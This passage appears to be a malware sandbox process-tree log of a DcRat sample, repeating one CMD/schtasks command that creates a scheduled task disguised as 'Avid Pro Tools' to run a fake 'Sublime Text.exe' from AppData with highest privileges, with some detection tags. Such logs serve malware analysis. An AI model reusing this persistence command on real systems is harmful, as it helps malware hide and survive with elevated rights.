C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:820
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2588
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1972
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2664
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1828
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2804
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:300
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2988
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2788
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1724
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1240
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2364
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:408
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2308
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2680
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:576
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1904
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2324
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2300
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:536
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1588
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1636
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1536
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2992
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1004
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1924
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2856
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1012
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2432
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1960
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1760
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1684
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1712
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2960
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1892
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:108
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:788
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2384
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2948
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2492
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2244
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2232
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1380
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1052
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1796
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1332
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1688
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2176
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1952
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:620
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1252
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2676
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2368
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2636
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:896
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1772
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2360
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2300
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3024
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:684
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:856
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1500
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:936
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2380
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:3020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1528
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2492
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2504
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1160
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2436
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1884
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:904
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1344
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2940
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1868
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2528
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1924
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1144
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1724
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1840
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2140
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1952
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2636
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2076
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:316
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1636
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1864
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2548
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:600
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2440
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2136
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2624
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2200
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1584
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2248
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2552
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2644
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:964
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2220
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2980
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2152
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2664
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1168
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2324
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1344
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2976
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:936
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2468
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2504
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2216
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1224
-
